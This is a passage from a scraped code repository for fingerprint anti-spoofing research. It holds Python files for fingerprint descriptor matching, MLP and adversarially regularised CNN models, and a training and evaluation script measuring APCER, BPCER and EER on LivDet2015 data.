filtersize))\n\n return temp2\n\n\ndef get_descriptors(img):\n\tclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\n\timg = clahe.apply(img)\n\timg = image_enhance(img)\n\timg = numpy.array(img, dtype=numpy.uint8)\n\t# Threshold\n\tret, img = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\n\t# Normalize to 0 and 1 range\n\timg[img == 255] = 1\n\n\t#Thinning\n\tskeleton = skeletonize(img)\n\tskeleton = numpy.array(skeleton, dtype=numpy.uint8)\n\tskeleton = removedot(skeleton)\n\t# Harris corners\n\tharris_corners = cv2.cornerHarris(img, 3, 3, 0.04)\n\tharris_normalized = cv2.normalize(harris_corners, 0, 255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32FC1)\n\tthreshold_harris = 125\n\t# Extract keypoints\n\tkeypoints = []\n\tfor x in range(0, harris_normalized.shape[0]):\n\t\tfor y in range(0, harris_normalized.shape[1]):\n\t\t\tif harris_normalized[x][y] > threshold_harris:\n\t\t\t\tkeypoints.append(cv2.KeyPoint(y, x, 1))\n\t# Define descriptor\n\torb = cv2.ORB_create()\n\t# Compute descriptors\n\t_, des = orb.compute(img, keypoints)\n\treturn (keypoints, des);\n\n\ndef match_imgs(img1, img2):\n\n #img1 and img2 are np.arrays\n\n kp1, des1 = get_descriptors(img1)\n kp2, des2 = get_descriptors(img2)\n \n # Matching between descriptors\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = sorted(bf.match(des1, des2), key= lambda match:match.distance)\n \n # Calculate score\n score = 0;\n for match in matches:\n score += match.distance\n score_threshold = 33*0.1\n score = score/len(matches)\n score = score*0.1\n\n return score\n\ndef MATCHER(original_batch, modified_batch):\n\n original_batch_ = original_batch.detach().cpu().numpy().copy()\n modified_batch_ = modified_batch.detach().cpu().numpy().copy()\n\n batch_size = original_batch_.shape[0]\n\n score = 0\n for i in range(batch_size):\n\n original_image = original_batch_[i][0]\n modified_image = modified_batch_[i][0]\n\n original_image = cv2.normalize(original_image, None, 
alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n modified_image = cv2.normalize(modified_image, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n\n original_image = np.uint8(original_image)\n modified_image = np.uint8(modified_image)\n\n score += match_imgs(original_image, modified_image)\n\n score = score/batch_size\n\n return score\n" }, { "alpha_fraction": 0.56605064868927, "alphanum_fraction": 0.5749486684799194, "avg_line_length": 24.63157844543457, "blob_id": "e4e38818aed31ca3e5434614d6205fd52689db88", "content_id": "36582f3695fa6fa4c6f2c680384d465d24e31660", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1461, "license_type": "no_license", "max_line_length": 77, "num_lines": 57, "path": "/MLP/layers/mlp_layers.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "'''\nBASED ON ANA FILIPA SEQUEIRA'S PREVIOUS WORK\n'''\n\nimport torch\nimport torch.nn as nn\nfrom torch import Tensor\n\n__negative_slope__ = 0.01\n\n\ndef get_activation_layer(activation):\n ''' Create activation layer '''\n if activation == 'relu':\n return nn.ReLU()\n elif activation == 'leaky_relu':\n return nn.LeakyReLU(__negative_slope__)\n elif activation == 'tanh':\n return nn.Tanh()\n else:\n errmsg = 'Invalid activation'\n raise Exception(errmsg)\n\ndef BasicDenseLayer(in_features,\n out_features,\n bnorm=True,\n activation='linear',\n dropout=0.0):\n ''' Create a composed dense layer\n (Linear - bnorm - activation - dropout) '''\n # ModuleList of layers (Linear - bnorm - activation - dropout)\n layers = nn.ModuleList([\n nn.Linear(in_features, out_features)\n ])\n\n if bnorm:\n layers.extend([nn.BatchNorm1d(out_features)]) # bnorm layer\n\n if activation != 'linear':\n layers.extend([get_activation_layer(activation)]) # activation layer\n\n if dropout > 0.0:\n 
layers.extend([nn.Dropout(dropout)])\n\n # Convert to Sequential\n BasicDense = nn.Sequential(*(layers))\n\n return BasicDense\n\n\nif __name__ == '__main__':\n\n a = BasicDenseLayer(in_features=32,\n out_features=128,\n bnorm=True,\n activation='relu')\n print(a)\n" }, { "alpha_fraction": 0.8365758657455444, "alphanum_fraction": 0.8365758657455444, "avg_line_length": 41.83333206176758, "blob_id": "df54b51b06e05fc175c412310bc648c8be6a0d43", "content_id": "7b979a6c7e4bd919b33121c6426e04bb012dd166", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 257, "license_type": "no_license", "max_line_length": 72, "num_lines": 6, "path": "/README.md", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "# Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning\nFingerprint Antispoofing/PAD (forgery detection) with deep learning.\n\nCNNreg - CNN regularized with adversarial training and transfer learning\n\nII-GAN - GAN that modify fake fingerprints\n" }, { "alpha_fraction": 0.4578854441642761, "alphanum_fraction": 0.47328734397888184, "avg_line_length": 28.540285110473633, "blob_id": "7c96c2d60d637b9d423c6c46aa5eaf0393c31901", "content_id": "6852f376c1e16d309f69b9ed642a2733d3a9ce48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6233, "license_type": "no_license", "max_line_length": 74, "num_lines": 211, "path": "/CNNreg/models/cnn_reg.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import math\nimport sys\n\nsys.path.insert(0, '../data/')\nsys.path.insert(0, '../layers/')\nsys.path.insert(0, '../utils/')\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.model_selection import ShuffleSplit\nfrom torch import Tensor\nfrom torch.nn import functional 
as F\n\nfrom cnn2_layers import BasicConvLayer, BasicDenseLayer\n\nN_CLASSES = 2 \nCHANNELS = 1 \n\nCONV_FILTERS = [64, 64, 128, 128, 256, 256, 256, 256]\n\nN_CONV = len(CONV_FILTERS)\n\n\nMAX_POOL = [False, True, False, True, False, False, False, True]\n\nK_SIZES = [3]*N_CONV\nSTRIDES = [1]*N_CONV\nPADDINGS = [1]*N_CONV\n\nTASK_DIMS = [4096, 4096, 1000, 2]\nADV_DIMS = [4096, 4096, 1000, 3]\n\nDROPOUT = .5\nBATCH_NORM = True\n\nN_CONV = len(CONV_FILTERS)\nN_FC = len(TASK_DIMS)\n\nclass CNN_REG(nn.Module):\n def __init__(self,\n activation='relu',\n bnorm=False,\n dropout=0.0):\n\n super(CNN_REG, self).__init__()\n\n self.activation = activation\n self.bnorm = bnorm\n self.dropout = dropout\n\n # Initialize conv layers\n self.create_conv_layers()\n \n self.avgpool = nn.AdaptiveAvgPool2d((7, 7))\n \n # Initialize fc layers\n self.create_task_classifier()\n self.create_adv_classifier()\n\n\n\n def create_conv_layers(self):\n # first conv layer\n conv_list = nn.ModuleList([\n BasicConvLayer(in_channels=CHANNELS,\n out_channels=CONV_FILTERS[0],\n kernel_size=K_SIZES[0],\n stride=STRIDES[0],\n bnorm=True,\n activation=self.activation,\n max_pool=MAX_POOL[0])\n ])\n\n # remaining conv layers\n conv_list.extend([BasicConvLayer(in_channels=CONV_FILTERS[l-1],\n out_channels=CONV_FILTERS[l],\n kernel_size=K_SIZES[l],\n stride=STRIDES[l],\n bnorm=True,\n activation=self.activation,\n max_pool=MAX_POOL[l])\n for l in range(1, N_CONV)])\n\n\n self.feature_extractor = nn.Sequential(*conv_list)\n\n def create_task_classifier(self):\n \n # first dense layer\n dense_list = nn.ModuleList([\n BasicDenseLayer(in_features=CONV_FILTERS[-1] * 7 * 7,\n out_features=TASK_DIMS[0],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n ])\n\n # remaining dense layers\n dense_list.extend([BasicDenseLayer(in_features=TASK_DIMS[l-1],\n out_features=TASK_DIMS[l],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n for l in range(1, N_FC-1)])\n\n # Last 
dense layer\n dense_list.append(BasicDenseLayer(in_features=TASK_DIMS[-2],\n out_features=TASK_DIMS[-1],\n bnorm=self.bnorm,\n activation='linear'))\n\n self.task_classifier = nn.Sequential(*dense_list)\n\n def create_adv_classifier(self):\n \n # first dense layer\n dense_list = nn.ModuleList([\n BasicDenseLayer(in_features=CONV_FILTERS[-1] * 7 * 7,\n out_features=ADV_DIMS[0],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n ])\n\n # remaining dense layers\n dense_list.extend([BasicDenseLayer(in_features=ADV_DIMS[l-1],\n out_features=ADV_DIMS[l],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n for l in range(1, N_FC-1)])\n\n # Last dense layer\n dense_list.append(BasicDenseLayer(in_features=ADV_DIMS[-2],\n out_features=ADV_DIMS[-1],\n bnorm=self.bnorm,\n activation='linear'))\n\n self.adv_classifier = nn.Sequential(*dense_list)\n\n def forward(self, x, x_fake):\n\n #TASK CLASSIFIER\n conv_list = ()\n for layer in range(N_CONV):\n x = self.feature_extractor[layer](x)\n conv_list += x,\n \n x = conv_list[-1]\n \n h_avgpool = self.avgpool(x)\n \n x = h_avgpool\n x = x.view(x.size(0), -1)\n \n h_task = () \n for layer in range(N_FC):\n x = self.task_classifier[layer](x)\n h_task += x, \n\n #ADV CLASSIFIER\n conv_list_fake = ()\n for layer in range(N_CONV):\n x_fake = self.feature_extractor[layer](x_fake)\n conv_list_fake += x_fake,\n \n x = conv_list_fake[-1]\n \n h_avgpool = self.avgpool(x)\n \n x = h_avgpool\n x = x.view(x.size(0), -1)\n \n h_adv = () \n for layer in range(N_FC):\n x = self.adv_classifier[layer](x)\n h_adv += x, \n \n return (conv_list, h_task, conv_list_fake, h_adv)\n \n def predict(self, x, x_fake):\n \n #probabilities of each class\n conv_list, h_task, conv_list_fake, h_adv = self.forward(x, x_fake)\n probs = F.softmax(h_task[-1], dim=1)\n \n return probs\n\n\nif __name__ == '__main__':\n \n import os\n os.getcwd()\n os.chdir(\"../\")\n os.getcwd()\n print(os.getcwd())\n\n print()\n if 
torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") \n print(\"Running on the GPU...\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU...\")\n print()\n \n\n model = CNN_REG().to(DEVICE)\n\n print(model)\n" }, { "alpha_fraction": 0.5064935088157654, "alphanum_fraction": 0.515460729598999, "avg_line_length": 28.94444465637207, "blob_id": "71ae5f709b35512154d9c6811712bda3690c1eb7", "content_id": "cc7dc065ef9aae331c9d9bcc9f12d0103df307e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3234, "license_type": "no_license", "max_line_length": 102, "num_lines": 108, "path": "/MLP/models/mlp_fpad.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "'''\nBASED ON ANA FILIPA SEQUEIRA'S PREVIOUS WORK\n'''\n\nimport math\nimport sys\n\nsys.path.insert(0, '../data/')\nsys.path.insert(0, '../layers/')\nsys.path.insert(0, '../utils/')\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.model_selection import ShuffleSplit\nfrom torch import Tensor\nfrom torch.nn import functional as F\n\nfrom mlp_layers import BasicDenseLayer\n\nclass MLP_FPAD(nn.Module):\n def __init__(self,\n input_dims=275,\n dense_dims=[128, 128, 2],\n activation='relu',\n bnorm=False,\n dropout=0.0,\n is_classifier=True):\n\n super(MLP_FPAD, self).__init__()\n\n self.input_dims = input_dims\n self.dense_dims = dense_dims\n self.activation = activation\n self.bnorm = bnorm\n self.dropout = dropout\n self.n_layers = len(self.dense_dims)\n self.is_classifier = is_classifier\n if self.is_classifier:\n self.n_layers = self.n_layers - 1\n\n # Initialize encoder layers\n self.create_dense_layers()\n\n def create_dense_layers(self):\n # first dense layer\n dense_list = nn.ModuleList([\n BasicDenseLayer(in_features=self.input_dims,\n out_features=self.dense_dims[0],\n bnorm=self.bnorm,\n activation=self.activation,\n 
dropout=self.dropout)\n ])\n\n # remaining dense layers\n dense_list.extend([BasicDenseLayer(in_features=self.dense_dims[l-1],\n out_features=self.dense_dims[l],\n bnorm=self.bnorm,\n activation=self.activation,\n dropout=self.dropout)\n for l in range(1, self.n_layers)])\n\n # Last dense layer\n if self.is_classifier:\n dense_list.append(BasicDenseLayer(in_features=self.dense_dims[-2],\n out_features=self.dense_dims[-1],\n bnorm=self.bnorm,\n activation='linear'))\n\n self.denseBlock = nn.Sequential(*dense_list)\n\n def forward(self, x):\n # get the activations of each layer\n h_list = ()\n for layer in range(len(self.dense_dims)):\n x = self.denseBlock[layer](x)\n h_list += x,\n return h_list\n \n def predict(self, x):\n #probabilities of each class\n h_list = self.forward(x)\n probs = F.softmax(h_list[-1], dim=1)\n \n return probs\n\n\nif __name__ == '__main__':\n \n import os\n os.getcwd()\n os.chdir(\"../\")\n os.getcwd()\n print(os.getcwd())\n\n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc. 
\n print(\"Running on the GPU...\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU...\")\n print()\n \n input_dims = 275\n model = MLP_FPAD(input_dims=input_dims).to(DEVICE)\n\n print(model)\n" }, { "alpha_fraction": 0.6296296119689941, "alphanum_fraction": 0.6296296119689941, "avg_line_length": 24.47058868408203, "blob_id": "97fcf36c1f4e4143638f934077211a4d9b7ad9ba", "content_id": "c17b01977ab315faeed0633431e9ea9bf3eee6e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 432, "license_type": "no_license", "max_line_length": 111, "num_lines": 17, "path": "/CNNreg/utils/cnn2_utils.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import numpy as np\n\ndef _nanargmin(arr): #return nan if there is no result of the np.nanargmin function\n try:\n return np.nanargmin(arr)\n except ValueError:\n return np.nan\n \ndef frange(start, stop, step): #creates list between start, top and with a defined step (for non integer steps)\n\n num = start\n _list = []\n while num <= stop:\n _list.append(num)\n num = num + step\n \n return _list" }, { "alpha_fraction": 0.4758661985397339, "alphanum_fraction": 0.4915063977241516, "avg_line_length": 41.761600494384766, "blob_id": "cfee7f6e4d9a50a3ad932d559f89f1e50471b151", "content_id": "4da859389707376714d6a0913045f1d3b3bc8a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26726, "license_type": "no_license", "max_line_length": 465, "num_lines": 625, "path": "/CNNreg/run_reg.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport numpy as np\nimport torch\nfrom torch.nn import functional as F\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom statistics import mean\nimport 
pickle\nimport math\nimport sys\n\nsys.path.insert(0, 'utils/')\nsys.path.insert(0, 'data/')\nsys.path.insert(0, 'models/')\nsys.path.insert(0, 'layers/')\nsys.path.insert(0, 'losses/')\n\nfrom cnn2_utils import _nanargmin, frange\nfrom data_cnn2 import get_data_loaders\nfrom cnn_reg import CNN_REG\nfrom losses_fpad import softCrossEntropyUniform, signer_transfer_loss_\n\n#%%\n\n# layers to regularize\nCONV_LAYERS = -1\n\ndef split_batch_per_signer(x, y, g_norm, h_conv, y_task, n_signers):\n\n \n \"\"\"split data per signer identity\n\n Parameters:\n x (type): batch of data\n y (type): batch of gesture labels\n g_norm (type): batch of signer iodentities labels\n h_conv (type): activations of conv layers\n h_dense (type): activations of dense layers\n y_task (type): class labels predictions\n n_signers (type): number of training signer identities\n\n Returns:\n x_split (type): x splitted by signer identity\n y_split (type): y splitted by signer identity\n g_split (type): g splitted by signer identity\n h_conv_split (type): h_conv splitted by signer identity\n h_dense_split (type): h_dense splitted by signer identity\n y_task_split (type): y_task splitted by signer identity\n\n \"\"\"\n x_split = [False]*n_signers\n y_split = [False]*n_signers\n g_split = [False]*n_signers\n y_task_split = [False]*n_signers\n h_conv_split = [False]*n_signers\n\n for s in range(n_signers):\n x_split[s] = x[g_norm == s]\n y_split[s] = y[g_norm == s]\n g_split[s] = g_norm[g_norm == s]\n\n h_conv_split[s] = [torch.mean(h[g_norm == s], dim=0)\n for h in h_conv[CONV_LAYERS:]]\n y_task_split[s] = y_task[g_norm == s]\n\n return x_split, y_split, g_split, h_conv_split, y_task_split\n\n#%% \n\nEPOCHS = 100\n\nloss_fn = F.cross_entropy\n\nLEARNING_RATE = 1e-04\nREG = 1e-04\n\nADV_WEIGHT_LIST = frange(0.1, 1, 0.1) #for optimization\nTRANSFER_WEIGHT_LIST = frange(0.1, 1, 0.1) #for optimization\n\ndef fit(model, adv_weight, transfer_weight, data, n_fake, device, model_path, output):\n # train and 
validation loaders\n train_loader, valid_loader = data\n print(\"Train/Val batches: {}/{}\".format(len(train_loader),\n len(valid_loader)))\n \n print(\"\\n * ADV_WEIGHT = {}\".format(adv_weight))\n print(\" * TRANSFER_WEIGHT = {}\".format(transfer_weight))\n\n # Set the optimizer\n task_opt = torch.optim.Adam(list(model.feature_extractor.parameters()) + \n list(model.task_classifier.parameters()),\n lr=LEARNING_RATE,\n weight_decay=REG)\n\n adv_opt = torch.optim.Adam(list(model.adv_classifier.parameters()),\n lr=LEARNING_RATE,\n weight_decay=REG)\n\n # Start training\n train_history = {'train_loss': [], 'train_acc': [], 'train_apcer': [], 'train_bpcer': [], 'train_eer': [], 'train_bpcer_apcer1': [], 'train_bpcer_apcer5': [], 'train_bpcer_apcer10': [], 'train_apcer1': [], 'train_apcer5': [], 'train_apcer10': [],\n 'val_loss': [], 'val_acc': [], 'val_apcer': [], 'val_bpcer': [], 'val_eer': [], 'val_bpcer_apcer1': [], 'val_bpcer_apcer5': [], 'val_bpcer_apcer10': [], 'val_apcer1': [], 'val_apcer5': [], 'val_apcer10': []}\n\n # Best validation params\n best_val = -float('inf')\n best_epoch = 0\n\n for epoch in range(EPOCHS):\n print('\\nEPOCH {}/{}\\n'.format(epoch + 1, EPOCHS))\n\n # TRAINING\n # set model to train\n model.train()\n for i, (x, y, f, f_norm) in enumerate(train_loader): \n\n x = x.to(device)\n x_fake = x[f != -1]\n \n if x.shape[0] == 0 or x_fake.shape[0] == 0:\n continue\n \n y = y.type(torch.LongTensor).to(device)\n f_norm_fake = f_norm[f != -1].type(torch.LongTensor).to(device)\n \n # forward pass\n conv_list, h_task, conv_list_fake, h_adv = model(x, x_fake)\n y_task = h_task[-1]\n y_adv = h_adv[-1]\n\n # Compute vae loss\n task_loss = loss_fn(y_task, y)\n adv_loss = loss_fn(y_adv, f_norm_fake)\n \n x_split, y_split, g_split, h_conv_split, y_task_split = split_batch_per_signer(x, y, f_norm, conv_list, y_task, n_fake-1)\n fake_on_batch = [i for i in range(len(g_split)) if len(g_split[i])]\n\n if len(fake_on_batch) <= 1:\n transfer_loss = 
torch.tensor(0.0)\n else:\n transfer_loss = signer_transfer_loss_(h_conv_split, fake_on_batch)\n \n loss = task_loss + adv_weight*softCrossEntropyUniform(y_adv) + transfer_weight*transfer_loss\n\n task_opt.zero_grad()\n loss.backward(retain_graph=True)\n task_opt.step()\n\n adv_opt.zero_grad()\n adv_loss.backward()\n adv_opt.step()\n\n # display the mini-batch loss\n sys.stdout.write(\"\\r\" + '........{}-th mini-batch loss: {:.3f} | task_loss: {:.3f} | CEU_loss: {:.3f} | adv_loss: {:.3f} | transfer_loss: {:.3f} '.format(i+1, loss.item(), task_loss.item(), softCrossEntropyUniform(y_adv).item(), adv_loss.item(), transfer_loss.item()))\n sys.stdout.flush()\n \n # Validation\n tr_loss, tr_acc, tr_apcer, tr_bpcer, tr_eer, tr_bpcer_apcer1, tr_bpcer_apcer5, tr_bpcer_apcer10, tr_apcer1, tr_apcer5, tr_apcer10 = eval_model(model, train_loader, n_fake, adv_weight, transfer_weight, device)\n train_history['train_loss'].append(tr_loss.item())\n train_history['train_acc'].append(tr_acc)\n train_history['train_apcer'].append(tr_apcer)\n train_history['train_bpcer'].append(tr_bpcer)\n train_history['train_eer'].append(tr_eer)\n train_history['train_bpcer_apcer1'].append(tr_bpcer_apcer1)\n train_history['train_bpcer_apcer5'].append(tr_bpcer_apcer5)\n train_history['train_bpcer_apcer10'].append(tr_bpcer_apcer10)\n train_history['train_apcer1'].append(tr_apcer1)\n train_history['train_apcer5'].append(tr_apcer5)\n train_history['train_apcer10'].append(tr_apcer10)\n\n val_loss, val_acc, val_apcer, val_bpcer, val_eer, val_bpcer_apcer1, val_bpcer_apcer5, val_bpcer_apcer10, val_apcer1, val_apcer5, val_apcer10 = eval_model(model, valid_loader, n_fake, adv_weight, transfer_weight, device)\n train_history['val_loss'].append(val_loss.item())\n train_history['val_acc'].append(val_acc)\n train_history['val_apcer'].append(val_apcer)\n train_history['val_bpcer'].append(val_bpcer)\n train_history['val_eer'].append(val_eer)\n train_history['val_bpcer_apcer1'].append(val_bpcer_apcer1)\n 
train_history['val_bpcer_apcer5'].append(val_bpcer_apcer5)\n train_history['val_bpcer_apcer10'].append(val_bpcer_apcer10)\n train_history['val_apcer1'].append(val_apcer1)\n train_history['val_apcer5'].append(val_apcer5)\n train_history['val_apcer10'].append(val_apcer10)\n\n\n # save best validation model\n if best_val < val_acc:\n torch.save(model.state_dict(), model_path + 'cnn2_fpad.pth')\n best_val = val_acc\n best_epoch = epoch\n\n # display the training loss\n print()\n print('\\n>> Train loss: {:.3f} |'.format(tr_loss.item()) + ' Train Acc: {:.3f}'.format(tr_acc) + '\\n Train APCER: {:.3f} |'.format(tr_apcer) + ' Train BPCER: {:.3f}'.format(tr_bpcer) + '\\n Train EER: {:.3f}'.format(tr_eer))\n\n print('\\n>> Valid loss: {:.3f} |'.format(val_loss.item()) + ' Valid Acc: {:.3f}'.format(val_acc) + '\\n Valid APCER: {:.3f} |'.format(val_apcer) + ' Valid BPCER: {:.3f}'.format(val_bpcer) + '\\n Valid EER: {:.3f}'.format(val_eer))\n\n print('\\n>> Best model: {} / Acc={:.3f}'.format(best_epoch+1, best_val))\n print()\n\n # save train/valid history\n plot_fn = output + 'cnn2_fpad_history.png'\n plot_train_history(train_history, plot_fn=plot_fn)\n\n # return best validation model\n model.load_state_dict(torch.load(model_path + 'cnn2_fpad.pth'))\n\n return model, train_history, valid_loader, best_epoch+1\n\n\ndef plot_train_history(train_history, plot_fn=None):\n plt.switch_backend('agg')\n\n best_val_epoch = np.argmin(train_history['val_loss'])\n best_val_acc = train_history['val_acc'][best_val_epoch]\n best_val_loss = train_history['val_loss'][best_val_epoch]\n plt.figure(figsize=(7, 5))\n epochs = len(train_history['train_loss'])\n x = range(epochs)\n plt.subplot(211)\n plt.plot(x, train_history['train_loss'], 'r-')\n plt.plot(x, train_history['val_loss'], 'g-')\n plt.plot(best_val_epoch, best_val_loss, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val loss')\n plt.legend(['train_loss', 'val_loss'])\n plt.axis([0, epochs, 0, max(train_history['train_loss'])])\n 
plt.subplot(212)\n plt.plot(x, train_history['train_acc'], 'r-')\n plt.plot(x, train_history['val_acc'], 'g-')\n plt.plot(best_val_epoch, best_val_acc, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val acc')\n plt.legend(['train_acc', 'val_acc'])\n plt.axis([0, epochs, 0, 1])\n if plot_fn:\n #plt.show()\n plt.savefig(plot_fn)\n plt.close()\n else:\n plt.show()\n\n\ndef eval_model(model, data_loader, n_fake, adv_weight, transfer_weight, device, debug=False):\n with torch.no_grad():\n\n model.eval()\n \n loss_eval = 0\n N = 0\n n_correct = 0\n \n TP = 0\n TN = 0\n FP = 0\n FN = 0\n \n PA = 0\n BF = 0\n \n eer_list = []\n \n BPCER_APCER1_list = []\n BPCER_APCER5_list = []\n BPCER_APCER10_list = []\n \n APCER1_list = []\n APCER5_list = []\n APCER10_list = []\n \n for i, (x, y, f, f_norm) in enumerate(data_loader):\n \n # send mini-batch to gpu\n x = x.to(device)\n x_fake = x[f != -1]\n \n if x.shape[0] == 0 or x_fake.shape[0] == 0:\n continue\n \n y = y.type(torch.LongTensor).to(device)\n f_norm_fake = f_norm[f != -1].type(torch.LongTensor).to(device)\n\n # forward pass\n conv_list, h_task, conv_list_fake, h_adv = model(x, x_fake) \n y_task = h_task[-1]\n y_adv = h_adv[-1]\n\n # Compute vae loss\n task_loss = loss_fn(y_task, y)\n adv_loss = loss_fn(y_adv, f_norm_fake)\n \n x_split, y_split, g_split, h_conv_split, y_task_split = split_batch_per_signer(x, y, f_norm, conv_list, y_task, n_fake-1)\n fake_on_batch = [i for i in range(len(g_split)) if len(g_split[i])]\n\n if len(fake_on_batch) <= 1:\n transfer_loss = torch.tensor(0.0)\n else:\n transfer_loss = signer_transfer_loss_(h_conv_split, fake_on_batch)\n \n loss = task_loss + adv_weight*softCrossEntropyUniform(y_adv) + transfer_weight*transfer_loss\n\n # Compute cnn loss\n loss_eval += loss * x.shape[0]\n\n # Compute Acc\n N += x.shape[0]\n ypred_ = torch.argmax(y_task, dim=1)\n n_correct += torch.sum(1.*(ypred_ == y)).item()\n \n y = y.cpu().numpy()\n ypred_ = ypred_.cpu().numpy()\n \n # Biometric metrics\n \n TP 
+= np.sum(np.logical_and(ypred_, y))\n TN += np.sum(np.logical_and(1-ypred_, 1-y))\n \n FP += np.sum(np.logical_and(ypred_, 1-y))\n FN += np.sum(np.logical_and(1-ypred_, y))\n \n PA += np.sum(y == 0)\n BF += np.sum(y == 1)\n \n probs = model.predict(x, x_fake)\n \n probs = probs.cpu().numpy()\n\n probs = probs[:, 1]\n \n fpr, tpr, threshold = metrics.roc_curve(y, probs)\n fnr = 1 - tpr \n \n BPCER_APCER1_list.append(fpr[(np.abs(fnr - 0.01)).argmin()])\n BPCER_APCER5_list.append(fpr[(np.abs(fnr - 0.05)).argmin()])\n BPCER_APCER10_list.append(fpr[(np.abs(fnr - 0.1)).argmin()])\n \n APCER1_list.append(fnr[(np.abs(fnr - 0.01)).argmin()])\n APCER5_list.append(fnr[(np.abs(fnr - 0.05)).argmin()])\n APCER10_list.append(fnr[(np.abs(fnr - 0.1)).argmin()])\n \n index = _nanargmin(np.absolute((fnr - fpr)))\n if math.isnan(index) == False:\n eer_list.append(fpr[index])\n\n loss_eval = loss_eval / N\n acc = n_correct / N\n APCER = (FP * 1.) / (FP + TN)\n BPCER = (FN * 1.) / (FN + TP)\n \n BPCER_APCER1=mean(BPCER_APCER1_list)\n BPCER_APCER5=mean(BPCER_APCER5_list)\n BPCER_APCER10=mean(BPCER_APCER10_list)\n \n APCER1=mean(APCER1_list)\n APCER5=mean(APCER5_list)\n APCER10=mean(APCER10_list)\n \n if eer_list != []:\n EER = mean(eer_list)\n else:\n EER = -float('inf')\n \n return loss_eval, acc, APCER, BPCER, EER, BPCER_APCER1, BPCER_APCER5, BPCER_APCER10, APCER1, APCER5, APCER10 \n\n\ndef main():\n \n IMG_PATH = \"/ctm-hdd-pool01/DB/LivDet2015/train/\"\n #IMG_PATH = \"L:/FPAD/Dataset/LivDet2015/train/\"\n \n CUDA = 0\n \n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:\" + str(CUDA)) # you can continue going on here, like cuda:1 cuda:2....etc. 
\n print(\"[Device] - GPU\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"[Device] - CPU\")\n \n mode = input(\"Enter the mode [train/optim/test]: \") #train\n data_ = input(\"Dataset [ALL/CrossMatch/Digital_Persona/GreenBit/Hi_Scan/Time_Series]: \")\n \n if mode==\"optim\":\n unseen_ = \"y\"\n else:\n unseen_ = input(\"Unseen attack? [y/n]: \") \n \n if unseen_ == \"y\":\n unseen = True\n NUM_ITERATIONS = 1\n attack_txt = \"UA\"\n elif unseen_ == \"n\":\n unseen = False \n NUM_ITERATIONS = 3\n attack_txt = \"OA\"\n else:\n sys.exit(\"Error ('Unseen attack?'): incorrect input!\")\n \n if data_ == \"ALL\": \n sensors = [\"CrossMatch\", \"Digital_Persona\", \"GreenBit\", \"Hi_Scan\", \"Time_Series\"] \n else: \n sensors = [data_] \n\n for DATASET in sensors:\n \n print(\"\\n[Dataset] - \" + DATASET + \"\\n\")\n \n \n if DATASET == \"CrossMatch\" or DATASET==\"Time_Series\":\n NUM_MATERIALS = 3\n else:\n NUM_MATERIALS = 4\n \n # For LOOP - Test splits\n train_results_ = []\n results = []\n best_epochs = [] \n optimization = []\n \n for iteration in range(NUM_ITERATIONS):\n \n print(\"\\n-- ITERATION {}/{} --\".format(iteration+1, NUM_ITERATIONS))\n \n for test_material in range(NUM_MATERIALS):\n \n output_fn = \"results/\" + DATASET + \"/\" + DATASET + \"_\" + str(test_material) + \"_\"\n model_path = \"/ctm-hdd-pool01/afpstudents/jaf/CNN2_\" + DATASET + \"_\" + str(test_material) + \"_\"\n \n n_fake_train = -1\n if unseen_ == \"y\":\n n_fake_train = NUM_MATERIALS-1\n if unseen_ == \"n\":\n n_fake_train = 1\n \n # Train, optimize or test\n if mode == 'train':\n\n model = CNN_REG().to(DEVICE)\n \n ADV_WEIGHT = 0.47 #0.4 #0.47\n TRANSFER_WEIGHT = 0.51 #0.11 #0.51\n \n (train_loader, valid_loader, test_loader) = get_data_loaders(IMG_PATH, DATASET, test_material, croped=True, unseen_attack=unseen)\n \n \n # Fit model\n model, 